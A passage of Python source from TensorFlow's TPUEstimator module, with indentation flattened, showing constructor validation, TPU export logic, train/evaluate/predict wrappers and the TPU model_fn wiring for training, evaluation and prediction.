False or `PER_HOST_V2`, batch_axis is ignored.
eval_on_tpu: If False, evaluation runs on CPU or GPU. In this case, the
model_fn must return `EstimatorSpec` when called with `mode` as `EVAL`.
export_to_tpu: If True, `export_saved_model()` exports a metagraph for
serving on TPU. Note that unsupported export modes such as EVAL will be
ignored. For those modes, only a CPU model will be exported.
Currently, export_to_tpu only supports PREDICT.
export_to_cpu: If True, `export_saved_model()` exports a metagraph for
serving on CPU.
warm_start_from: Optional string filepath to a checkpoint or SavedModel to
warm-start from, or a `tf.estimator.WarmStartSettings` object to fully
configure warm-starting. If the string filepath is provided instead of
a `WarmStartSettings`, then all variables are warm-started, and it is
assumed that vocabularies and Tensor names are unchanged.
experimental_export_device_assignment: Whether to include the device
assignment in the exported model. Doing so is useful in case of model
parallel inference but will tie the exported model to the TPU topology
used to export the model.
embedding_config_spec: Optional EmbeddingConfigSpec instance
to support using TPU embedding.
export_saved_model_api_version: ExportSavedModelApiVersion, V1 or V2.
With V1, `export_saved_model()` adds rewrite() and TPUPartitionedCallOp()
for the user; with V2, the user is expected to add rewrite(),
TPUPartitionedCallOp(), etc. in their model_fn.
A helper function `inference_on_tpu` is provided for V2.
brn_tpu_estimator.py includes examples for both versions,
i.e. TPUEstimatorExportTest and TPUEstimatorExportV2Test.
Raises:
ValueError: `params` has reserved keys already.
"""
if config is None or not isinstance(config, tpu_config.RunConfig):
raise ValueError(
'`config` must be provided with type `tpu_config.RunConfig`')
if params is not None and any(k in params for k in _RESERVED_PARAMS_KEYS):
raise ValueError('{} are reserved keys but existed in params {}.'.format(
_RESERVED_PARAMS_KEYS, params))
if use_tpu:
# Perform some very basic validations. More validations will be found in
# _InternalTPUContext.
if train_batch_size is None:
raise ValueError('`train_batch_size` cannot be `None`')
util_lib.check_positive_integer(train_batch_size, 'train_batch_size')
if (config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.PER_SHARD_V1 and
config.tpu_config.num_cores_per_replica):
raise ValueError(
'Model parallelism only supports per host input for training. '
'Please adjust TPURunconfig.per_host_input_for_training.')
if eval_batch_size is not None:
util_lib.check_positive_integer(eval_batch_size, 'eval_batch_size')
if predict_batch_size is not None:
util_lib.check_positive_integer(predict_batch_size,
'predict_batch_size')
if embedding_config_spec:
if (config.tpu_config.per_host_input_for_training !=
tpu_config.InputPipelineConfig.PER_HOST_V2):
raise ValueError('Only PER_HOST_V2 is supported when using TPU '
'Embedding; got {}.'.format(
config.tpu_config.per_host_input_for_training))
# Verifies the model_fn signature according to Estimator framework.
estimator_lib._verify_model_fn_args(model_fn, params) # pylint: disable=protected-access
# We cannot store config and params in this constructor as parent
# constructor might change them, such as assigning a temp dir for
# config.model_dir.
model_function = self._augment_model_fn(model_fn, batch_axis)
# Overwrite log_step_count_steps to disable TensorLoggingHook and
# StepCounterHook from being created in Estimator. TPUEstimator already
# added equivalent hooks in _augment_model_fn above.
self._log_every_n_steps = config.log_step_count_steps
config = config.replace(log_step_count_steps=None)
# Pass non-None params, as the wrapped model_fn expects it.
params = params or {}
super(TPUEstimator, self).__init__(
model_fn=model_function,
model_dir=model_dir,
config=config,
params=params,
warm_start_from=warm_start_from)
self._iterations_per_training_loop = util_lib.parse_iterations_per_loop(
self._config.tpu_config.iterations_per_loop)
# In the absence of an explicit `log_every_n_secs` config, if the
# `iterations_per_loop` value is specified as time in seconds, enable
# logging every n secs based on the `iterations_per_loop` value. This is a
# trade-off to avoid an API change in the current release.
# TODO(henrytan): add `log_every_n_secs` to RunConfig.
if self._iterations_per_training_loop.unit == 'seconds':
self._log_every_n_secs = self._iterations_per_training_loop.value
self._log_every_n_steps = None
elif self._iterations_per_training_loop.unit == 'count':
if self._log_every_n_steps is not None:
# Each session.run() lasts for iterations_per_loop. We can't log
# in-between a session.run(), and we can only log after the
# `iterations_per_loop` steps, so we can only approximate. If a user
# requests to log every N steps, we actually want to roughly log every
# N / `iterations_per_loop` steps to match the original intention.
self._log_every_n_steps = (
int(math.ceil(float(self._log_every_n_steps) /
self._iterations_per_training_loop.value)))
self._log_every_n_secs = None
else:
assert False, ('Invalid TPUConfig `iterations_per_loop` value. '
'Indicates a bug in `iterations_per_loop` '
'parsing.')
# All properties passed to _InternalTPUContext are immutable.
# pylint: disable=protected-access
self._ctx = tpu_context._get_tpu_context(
self._config, train_batch_size, eval_batch_size, predict_batch_size,
use_tpu, eval_on_tpu, embedding_config_spec)
self._export_to_cpu = export_to_cpu
self._export_to_tpu = export_to_tpu
self._experimental_export_device_assignment = (
experimental_export_device_assignment)
if not isinstance(export_saved_model_api_version,
ExportSavedModelApiVersion):
raise ValueError('export_saved_model_api_version should be of type '
'ExportSavedModelApiVersion; got {}.'.format(
export_saved_model_api_version))
self._export_saved_model_api_version = export_saved_model_api_version
self._is_input_fn_invoked = None
self._rendezvous = {}
def _add_meta_graph_for_mode(self,
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=True,
mode=model_fn_lib.ModeKeys.PREDICT,
export_tags=None,
check_variables=True,
strip_default_attrs=True):
if self._export_to_tpu and mode != model_fn_lib.ModeKeys.PREDICT:
logging.warning('TPUEstimator only handles mode PREDICT for exporting '
'when `export_to_tpu` is `True`; Mode {} will be ignored '
'for TPU.'.format(mode))
if not self._export_to_cpu and not self._export_to_tpu:
raise ValueError('One of export_to_cpu and export_to_tpu must be true.')
if self._export_to_cpu:
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
strip_default_attrs=strip_default_attrs))
if self._export_to_tpu and mode == model_fn_lib.ModeKeys.PREDICT:
input_receiver_fn_map = {
_INFERENCE_ON_TPU_MODE: input_receiver_fn_map[mode]
}
export_tags = [tag_constants.SERVING, tag_constants.TPU]
mode = _INFERENCE_ON_TPU_MODE
# See b/110052256 for why `check_variables` is `False`.
if not self._export_to_cpu:
check_variables = save_variables = True
else:
check_variables = save_variables = False
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
save_variables=save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
strip_default_attrs=strip_default_attrs))
def _call_model_fn(self, features, labels, mode, config):
if self._export_saved_model_api_version == ExportSavedModelApiVersion.V1:
if mode == _INFERENCE_ON_TPU_MODE:
return self._call_model_fn_for_inference(features, labels, mode, config)
else:
return super(TPUEstimator, self)._call_model_fn(features, labels, mode,
config)
else:
return super(TPUEstimator, self)._call_model_fn(features, labels, mode,
config)
def _call_model_fn_for_inference(self, features, labels, mode, config):
"""Wraps `_call_model_fn` for `export_saved_model`."""
if mode != _INFERENCE_ON_TPU_MODE:
raise ValueError('mode must be {}; '
'got {}.'.format(_INFERENCE_ON_TPU_MODE, mode))
return model_fn_inference_on_tpu(
self._model_fn,
features,
labels,
config,
self._params,
batch_config=None,
experimental_export_device_assignment=self
._experimental_export_device_assignment,
call_context=self._ctx)
def _create_global_step(self, graph):
"""Creates a global step suitable for TPUs.
Args:
graph: The graph in which to create the global step.
Returns:
A global step `Tensor`.
Raises:
ValueError: if the global step tensor is already defined.
"""
return _create_global_step(graph)
def _convert_train_steps_to_hooks(self, steps, max_steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.TRAIN) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_train_steps_to_hooks(
steps, max_steps)
# On TPU.
if steps is None and max_steps is None:
raise ValueError(
'For TPU training, one of `steps` or `max_steps` must be set. '
'Cannot be both `None`.')
# Estimator.train has explicit positiveness check.
if steps is not None:
util_lib.check_positive_integer(steps, 'Train steps')
if max_steps is not None:
util_lib.check_positive_integer(max_steps, 'Train max_steps')
return [
_TPUStopAtStepHook(
self._iterations_per_training_loop, steps, max_steps)
]
def _convert_eval_steps_to_hooks(self, steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.EVAL) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_eval_steps_to_hooks(steps)
if steps is None:
raise ValueError('Evaluate `steps` must be set on TPU. Cannot be `None`.')
util_lib.check_positive_integer(steps, 'Eval steps')
return [
evaluation._StopAfterNEvalsHook( # pylint: disable=protected-access
num_evals=steps),
_SetEvalIterationsHook(steps)
]
def _call_input_fn(self, input_fn, mode):
"""Calls the input function.
Args:
input_fn: The input function.
mode: ModeKeys
Returns:
In TPU mode, returns an input_fn to be called later in model_fn.
Otherwise, calls the input_fn and returns either features or
(features, labels).
Raises:
ValueError: if input_fn takes invalid arguments or does not have `params`.
"""
input_fn_args = function_utils.fn_args(input_fn)
config = self.config # a deep copy.
kwargs = {}
if 'params' in input_fn_args:
kwargs['params'] = self.params # a deep copy.
else:
raise ValueError('input_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params["batch_size"]'.format(input_fn))
if 'config' in input_fn_args:
kwargs['config'] = config
if 'mode' in input_fn_args:
kwargs['mode'] = mode
# Records the fact input_fn has been invoked.
self._is_input_fn_invoked = True
with self._ctx.with_mode(mode) as ctx:
# Set the batch size in params first. This helps the user have the same
# input_fn for use_tpu=True/False.
batch_size_for_input_fn = ctx.batch_size_for_input_fn
if batch_size_for_input_fn is not None:
_add_item_to_params(kwargs['params'], _BATCH_SIZE_KEY,
batch_size_for_input_fn)
# For export_saved_model, input_fn is never passed to Estimator. So,
# `is_export_mode` must be False.
if ctx.is_running_on_cpu(is_export_mode=False):
with ops.device('/device:CPU:0'):
return input_fn(**kwargs)
# For TPU computation, input_fn should be invoked in a tf.while_loop for
# performance. While constructing the tf.while_loop, the structure of
# inputs returned by the `input_fn` needs to be recorded. The structure
# includes whether features or labels is dict or single Tensor, dict keys,
# tensor shapes, and dtypes. The recorded structure is used to create the
# infeed dequeue ops, which must be wrapped and passed as a Fn, called
# inside the TPU computation, as the TPU computation is wrapped inside a
# tf.while_loop also. So, we either pass input_fn to model_fn or pass
# dequeue_fn to model_fn. Here, `input_fn` is passed directly as
# `features` in `model_fn` signature.
def _input_fn(ctx):
_add_item_to_params(kwargs['params'], _CTX_KEY, ctx)
return input_fn(**kwargs)
return _input_fn
def _validate_features_in_predict_input(self, result):
"""Skip the validation.
For TPUEstimator, we do not need to check the result type. `_InputPipeline`
has a stronger check. The parent class's check generates a confusing warning
message.
Args:
result: `features` returned by input_fn.
"""
pass
def train(self,
input_fn,
hooks=None,
steps=None,
max_steps=None,
saving_listeners=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.TRAIN] = rendezvous
try:
return super(TPUEstimator, self).train(
input_fn=input_fn,
hooks=hooks,
steps=steps,
max_steps=max_steps,
saving_listeners=saving_listeners)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('training_loop', sys.exc_info())
finally:
rendezvous.record_done('training_loop')
rendezvous.raise_errors()
def evaluate(self,
input_fn,
steps=None,
hooks=None,
checkpoint_path=None,
name=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.EVAL] = rendezvous
try:
return super(TPUEstimator, self).evaluate(
input_fn,
steps=steps,
hooks=hooks,
checkpoint_path=checkpoint_path,
name=name)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('evaluation_loop', sys.exc_info())
finally:
rendezvous.record_done('evaluation_loop')
rendezvous.raise_errors()
def predict(self,
input_fn,
predict_keys=None,
hooks=None,
checkpoint_path=None,
yield_single_examples=True):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.PREDICT] = rendezvous
try:
for result in super(TPUEstimator, self).predict(
input_fn=input_fn,
predict_keys=predict_keys,
hooks=hooks,
checkpoint_path=checkpoint_path,
yield_single_examples=yield_single_examples):
yield result
except Exception: # pylint: disable=broad-except
rendezvous.record_error('prediction_loop', sys.exc_info())
finally:
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
def _augment_model_fn(self, model_fn, batch_axis):
"""Returns a new model_fn, which wraps the TPU support."""
def _model_fn(features, labels, mode, config, params):
"""A Estimator `model_fn` for TPUEstimator."""
# `input_fn` is called in `train()`, `evaluate()`, and `predict()`,
# but not in `export_saved_model()`.
if self._is_input_fn_invoked:
is_export_mode = False
else:
is_export_mode = True
# Clear the bit.
self._is_input_fn_invoked = None
if is_export_mode:
if mode == _INFERENCE_ON_TPU_MODE:
_add_item_to_params(params, _USE_TPU_KEY, True)
mode = model_fn_lib.ModeKeys.PREDICT
else:
_add_item_to_params(params, _USE_TPU_KEY, False)
with self._ctx.with_mode(mode) as ctx:
model_fn_wrapper = _ModelFnWrapper(model_fn, config, params, ctx)
# examples_hook is added to training_hooks for both CPU and TPU
# execution.
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
examples_hook = ExamplesPerSecondHook(
ctx.global_batch_size,
# pylint:disable=g-long-ternary
output_dir=(self.model_dir
if not config or config.save_summary_steps
else None),
# pylint:enable=g-long-ternary
every_n_steps=self._log_every_n_steps,
every_n_secs=self._log_every_n_secs)
if ctx.is_running_on_cpu(is_export_mode=is_export_mode):
logging.info('Running %s on CPU', mode)
estimator_spec = model_fn_wrapper.call_without_tpu(
features, labels, is_export_mode=is_export_mode)
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
estimator_spec = estimator_spec._replace(
training_hooks=estimator_spec.training_hooks + (examples_hook,))
return estimator_spec
assert labels is None, '`labels` passed to `model_fn` must be `None`.'
# TPUEstimator._call_input_fn passes `input_fn` as features to here.
assert callable(features), '`input_fn` is not callable.'
input_fn = features
tpu_init_ops = []
if ctx.embedding_config and mode == model_fn_lib.ModeKeys.TRAIN:
dummy_table_variables, dummy_table_variables_init = (
tpu_embedding_gradient.create_dummy_table_variables(
ctx.embedding_config.tpu_embedding))
ctx.embedding_config.dummy_table_variables = dummy_table_variables
tpu_init_ops.append(dummy_table_variables_init)
input_holders = _InputPipeline(input_fn, batch_axis, ctx)
enqueue_ops, dequeue_fn, input_hooks, run_infeed_loop_on_coordinator = (
input_holders.generate_infeed_enqueue_ops_and_dequeue_fn())
graph = ops.get_default_graph()
for enqueue_op in enqueue_ops:
if isinstance(enqueue_op, list):
graph.get_collection_ref(_TPU_ENQUEUE_OPS).extend(enqueue_op)
else:
graph.add_to_collection(_TPU_ENQUEUE_OPS, enqueue_op)
if mode == model_fn_lib.ModeKeys.TRAIN:
compile_op, loss, host_call, scaffold_fn, training_hooks = (
_train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
if ctx.embedding_config:
g = ops.get_default_graph()
table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
optimization_parameters = (
ctx.embedding_config.tpu_embedding.optimization_parameters)
embedding_variable_name_by_table, slot_variable_names_by_table = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict, optimization_parameters
)
)
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table,
slot_variable_names_by_table
))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
# scaffold_fn must be called after the variables for TPU embedding have
# been created on the CPU, as the user might reinitialize those from some
# checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
host_ops = host_call.create_tpu_hostcall()
shutdown_hooks = []
shutdown_mode = os.environ.get('TF_TPU_GRACEFUL_SHUTDOWN_MODE',
'reset_computation')
if shutdown_mode:
if shutdown_mode == 'shutdown_worker':
finalizer_hooks = [
session_support.ShutdownLameWorkers(),
]
elif shutdown_mode == 'shutdown_all_workers':
finalizer_hooks = [
session_support.ShutdownAllWorkers(),
]
elif shutdown_mode == 'reset_computation':
finalizer_hooks = [
session_support.ResetComputation(),
]
elif not shutdown_mode:
finalizer_hooks = []
else:
raise ValueError(
'Unknown TF_TPU_GRACEFUL_SHUTDOWN_MODE "%s"' % shutdown_mode)
if finalizer_hooks:
shutdown_hooks.append(
session_support.GracefulShutdownHook(
checkpoint_prefix=self.model_dir + '/model.ckpt',
on_shutdown_hooks=finalizer_hooks))
with ops.control_dependencies([loss]):
global_step = array_ops.identity(training.get_global_step())
hooks = input_hooks + shutdown_hooks
hooks.extend([
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops),
InstallSignalHandlerHook()
])
if tpu_cluster_resolver.is_running_in_gce():
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
if self._iterations_per_training_loop.unit == 'count':
examples_hook._set_steps_per_run( # pylint: disable=protected-access
self._iterations_per_training_loop.value)
hooks.append(training.LoggingTensorHook(
{
'loss': array_ops.identity(loss),
'step': global_step,
},
every_n_iter=self._log_every_n_steps,
every_n_secs=self._log_every_n_secs))
hooks.append(examples_hook)
if training_hooks:
hooks.extend(training_hooks)
chief_hooks = []
if (self._config.save_checkpoints_secs or
self._config.save_checkpoints_steps):
checkpoint_hook = training.CheckpointSaverHook(
self.model_dir,
save_secs=self._config.save_checkpoints_secs,
save_steps=self._config.save_checkpoints_steps,
scaffold=scaffold)
if self._iterations_per_training_loop.unit == 'count':
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
self._iterations_per_training_loop.value)
else:
# When estimating iterations_per_loop, set steps_per_run to an
# arbitrarily high number to force checking the global step on
# every call.
# TODO(henrytan): refactor SecondOrStepTimer to do this more
# explicitly.
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
100000)
chief_hooks.append(checkpoint_hook)
summary.scalar(model_fn_lib.LOSS_METRIC_KEY, loss)
with ops.control_dependencies([loss]):
update_ops = _sync_variables_ops(ctx)
if ctx.embedding_config:
update_ops.extend(embedding_variables_and_ops.retrieve_ops())
# Validate the TPU training graph to catch basic errors
_validate_tpu_training_graph()
train_op = control_flow_ops.group(*update_ops)
graph.add_to_collection(_TPU_TRAIN_OP, train_op)
return model_fn_lib.EstimatorSpec(
mode,
loss=loss,
training_chief_hooks=chief_hooks,
training_hooks=hooks,
train_op=train_op,
scaffold=scaffold)
if mode == model_fn_lib.ModeKeys.EVAL:
compile_op, total_loss, host_calls, scaffold_fn, eval_hooks = (
_eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
if ctx.embedding_config:
g = ops.get_default_graph()
table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
embedding_variable_name_by_table, _ = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict)
)
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table
))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
# scaffold_fn must be called after the variables for TPU embedding have
# been created on the CPU, as the user might reinitialize those from some
# checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
iterations_per_loop_var = _create_or_get_iterations_per_loop()
mean_loss = math_ops.div(
total_loss,
math_ops.cast(iterations_per_loop_var, dtype=total_loss.dtype))
with ops.control_dependencies([mean_loss]):
# After the TPU evaluation computation is done (the mean_loss tensor),
# read all variables back from the TPU and update the eval step
# counter properly.
internal_ops_to_run = _sync_variables_ops(ctx)
internal_ops_to_run.append(
_increase_eval_step_op(iterations_per_loop_var))
host_call_ret = host_calls.create_tpu_hostcall()
eval_metric_ops = {}
eval_update_ops = []
eval_metrics = host_call_ret.get('eval_metrics', {})
if eval_metrics:
# Create a dummy metric update_op for all metrics. Estimator expects
# all metrics in `eval_metric_ops` to have an update_op and calls them
# one by one. The real metric update_ops are invoked in a separate
# thread, so here we give Estimator the dummy op for all metrics.
with ops.control_dependencies(internal_ops_to_run):
dummy_update_op = control_flow_ops.no_op()
for k, v in eval_metrics.items():
eval_metric_ops[k] = (v[0], dummy_update_op)
eval_update_ops.append(v[1])
else:
# If no eval metrics are passed, create an identity node for the
# loss and add `internal_ops_to_run` to its dependencies. So
# `internal_ops_to_run` can be executed.
with ops.control_dependencies(internal_ops_to_run):
mean_loss = array_ops.identity(mean_loss)
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
eval_update_ops + host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.evaluation_master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops)
] + input_hooks
if tpu_cluster_resolver.is_running_in_gce():
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
if eval_hooks:
hooks.extend(eval_hooks)
return model_fn_lib.EstimatorSpec(
mode,
loss=mean_loss,
evaluation_hooks=hooks,
eval_metric_ops=eval_metric_ops,
scaffold=scaffold)
# Predict
assert mode == model_fn_lib.ModeKeys.PREDICT
(compile_op, dummy_predict_op, host_calls,
scaffold_fn, prediction_hooks) = _predict_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn)
scaffold = _get_scaffold(scaffold_fn)
with ops.control_dependencies([dummy_predict_op]):
internal_ops_to_run = _sync_variables_ops(ctx)
with ops.control_dependencies(internal_ops_to_run):
dummy_predict_op = control_flow_ops.no_op()
# In train and evaluation, the main TPU program is passed to monitored
# training session to run. Infeed enqueue and outfeed dequeue are
# executed in side threads. This is not the configuration for
# prediction mode.
#
# For prediction, the Estimator executes the EstimatorSpec.predictions
# directly and yields the elements (via a generator) to the call site. So,
# the outfeed-based prediction must be passed to MonitoredSession directly.
# Other parts of the TPU execution are organized as follows.
#
# 1. All outfeed based Tensors must be grouped with predictions Tensors
# to form a single invocation. This avoids the issue that we might trigger
# multiple outfeeds incorrectly. To achieve this, `host_call` is
# placed in control_dependencies of `stopping_signals`, and
# `stopping_signals` is passed into _StoppingPredictHook, which sets
# the `stopping_signals` as SessionRunArgs. MonitoredSession merges
# all SessionRunArgs with the fetch in session.run together.
#
# 2. The TPU program (dummy_predict_op) and enqueue_ops (infeed Enqueue)
# are grouped together. They will be launched once and only once in
# side threads and they quit naturally according to the SAME stopping
# condition.
enqueue_ops.append(dummy_predict_op)
host_call_ret = host_calls.create_tpu_hostcall()
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
predictions = host_call_ret['predictions']
_verify_cross_hosts_transfer_size(
predictions,
message=(
'The estimated size for TPUEstimatorSpec.predictions is too '
'large.'))
signals = host_call_ret['signals']
with ops.control_dependencies(host_ops):
host_ops = []  # Empty; we do not need it anymore.
scalar_stopping_signal = _StopSignals.as_scalar_stopping_signal(
signals)
predictions = _PaddingSignals.slice_tensor_or_dict(
predictions, signals)
hooks = [
_StoppingPredictHook(scalar_stopping_signal),
TPUInfeedOutfeedSessionHookForPrediction(
ctx, enqueue_ops, host_ops, rendezvous=self._rendezvous[mode],
tpu_compile_op=compile_op,
master=self._config.master,
session_config=self._session_config),
] + input_hooks
if prediction_hooks:
hooks.extend(prediction_hooks)
return model_fn_lib.EstimatorSpec(
mode,
prediction_hooks=hooks,
predictions=predictions,
scaffold=scaffold)
return _model_fn
def _export_output_to_tensors(export_output):
"""Get a list of `Tensors` used in `export_output`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
Returns:
a list of tensors used in export_output.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
return [export_output.scores, export_output.classes]
elif isinstance(export_output, export_output_lib.RegressionOutput):
return [export_output.value]
elif isinstance(export_output, export_output_lib.PredictOutput):
return list(export_output.outputs.values())
else:
raise ValueError(
'`export_output` must have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _clone_export_output_with_tensors(export_output, tensors):
"""Clones `export_output` but with new `tensors`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
tensors: a list of `Tensors` used to construct a new `export_output`.
Returns:
A new `ExportOutput` of the same type as `export_output`, built from `tensors`.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
if len(tensors) != 2:
raise ValueError('tensors must be of length 2; '
'got {}.'.format(len(tensors)))
return export_output_lib.ClassificationOutput(*tensors)
elif isinstance(export_output, export_output_lib.RegressionOutput):
if len(tensors) != 1:
raise ValueError('tensors must be of length 1; '
'got {}'.format(len(tensors)))
return export_output_lib.RegressionOutput(*tensors)
elif isinstance(export_output, export_output_lib.PredictOutput):
return export_output_lib.PredictOutput(
dict(zip(export_output.outputs.keys(), tensors)))
else:
raise ValueError(
'`export_output` must have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
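# Illustrative sketch (not part of the original module): the two helpers above
# round-trip an `ExportOutput` through a flat list of Tensors so the Tensors
# can be rewritten (e.g. moved off the TPU) and the output object rebuilt.
# A hypothetical usage, assuming `scores`, `classes` and `new_tensors` exist:
#
#   tensors = _export_output_to_tensors(
#       export_output_lib.ClassificationOutput(scores, classes))
#   # ... rewrite `tensors` into `new_tensors` ...
#   rebuilt = _clone_export_output_with_tensors(
#       export_output_lib.ClassificationOutput(scores, classes), new_tensors)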
def _eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
) = model_fn_wrapper.convert_to_single_tpu_eval_step(dequeue_fn)
@tpu_function.on_device_training_loop
def multi_tpu_eval_steps_on_single_shard():
return training_loop.repeat(iterations_per_loop_var, single_tpu_eval_step,
[_ZERO_LOSS])
(compile_op, loss,) = tpu.split_compile_and_shard(
multi_tpu_eval_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
return (compile_op, loss, host_calls, captured_scaffold_fn,
captured_eval_hooks.get())
def _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_train_step, host_call, captured_scaffold_fn,
captured_training_hooks) = (
model_fn_wrapper.convert_to_single_tpu_train_step(dequeue_fn))
@tpu_function.on_device_training_loop
def multi_tpu_train_steps_on_single_shard():
return training_loop.repeat(iterations_per_loop_var, single_tpu_train_step,
[_INITIAL_LOSS])
(compile_op, loss,) = tpu.split_compile_and_shard(
multi_tpu_train_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
return (compile_op, loss, host_call, captured_scaffold_fn,
captured_training_hooks.get())
def _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
(single_tpu_predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks
) = model_fn_wrapper.convert_to_single_tpu_predict_step(dequeue_fn)
@tpu_function.on_device_training_loop
def multi_tpu_predict_steps_on_single_shard():
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
inputs = [_StopSignals.NON_STOPPING_SIGNAL]
outputs = training_loop.while_loop(
cond, single_tpu_predict_step, inputs=inputs, name=b'loop')
return outputs
(compile_op, dummy_predict_op,) = tpu.split_compile_and_shard(
multi_tpu_predict_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
dummy_predict_op = dummy_predict_op[0]
return (compile_op, dummy_predict_op, host_calls, captured_scaffold_fn,
captured_predict_hooks.get())
def _wrap_computation_in_while_loop(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def computation(i):
with ops.control_dependencies(op_fn()):
return i + 1
iterations_per_loop_var = _create_or_get_iterations_per_loop()
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
iterations = array_ops.identity(iterations_per_loop_var)
return control_flow_ops.while_loop(
lambda i: i < iterations,
computation, [constant_op.constant(0)],
parallel_iterations=1)
def _wrap_computation_in_while_loop_with_stopping_signals(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
def computation(unused_scalar_stopping_signal):
return_value = op_fn()
execute_ops = return_value['ops']
signals = return_value['signals']
with ops.control_dependencies(execute_ops):
return _StopSignals.as_scalar_stopping_signal(signals)
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
return control_flow_ops.while_loop(
cond,
computation, [_StopSignals.NON_STOPPING_SIGNAL],
parallel_iterations=1)
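# Illustrative sketch (not part of the original module): the generic pattern of
# the two wrappers above is to re-run the host-side ops returned by `op_fn`
# once per device iteration, with parallel_iterations=1 so iterations run
# strictly in sequence. Hypothetical usage:
#
#   def op_fn():
#     return [outfeed_dequeue_op]  # hypothetical host-side op
#   loop_op = _wrap_computation_in_while_loop('/cpu:0', op_fn)
#   # session.run(loop_op) re-runs the ops iterations_per_loop times.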
def _validate_tpu_training_graph():
"""Validate graph before running distributed training.
Raises:
ValueError: If the graph seems invalid for running on device
"""
